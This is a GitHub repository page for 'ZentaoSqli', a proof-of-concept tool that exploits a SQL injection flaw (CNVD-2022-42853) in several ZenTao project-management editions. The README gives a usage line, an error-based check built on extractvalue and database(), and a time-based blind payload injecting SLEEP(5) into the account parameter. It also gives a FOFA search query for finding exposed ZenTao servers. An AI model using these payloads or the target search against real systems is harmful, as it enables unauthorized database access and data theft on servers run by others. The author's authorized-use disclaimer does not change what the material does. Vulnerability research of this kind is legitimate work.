Skip to content
/ ZentaoSqli Public

ZentaoSqli 禅道存在SQL注入漏洞 CNVD-2022-42853

21 stars 5 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

west9b/ZentaoSqli

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
POC.png
POC.png
 
 
README.md
README.md
 
 
Zentao.go
Zentao.go
 
 
main.go
main.go
 
 

Repository files navigation

ZentaoSqli 禅道存在SQL注入漏洞 CNVD-2022-42853

author:160team.west9B

仅限用于安全研究人员在授权的情况下使用,遵守网络安全法,产生任何问题,后果自负,与作者无关。

01-基本介绍

漏洞编号

CNVD-2022-42853 公开日期:2022/6/14

影响产品

禅道企业版 6.5

禅道旗舰版 3.0

禅道开源版 16.5

禅道开源版 16.5.beta1

02-使用说明

usage: ./Zentao.exe -u url (加http://)

禅道当前数据库都是zentao,判断注入条件 extractvalue(1,concat(0x7e,(database()),0x7e) == zentao

盲注payload account=admin';SELECT SLEEP(5)#

Screenshots

Image text

fofa

app="易软天创-禅道系统"

About

ZentaoSqli 禅道存在SQL注入漏洞 CNVD-2022-42853

Resources

Readme
Activity

Stars

21 stars

Watchers

2 watching

Forks

5 forks
Report repository

Releases 1

1.0 Latest
Aug 22, 2022

Packages

No packages published

Languages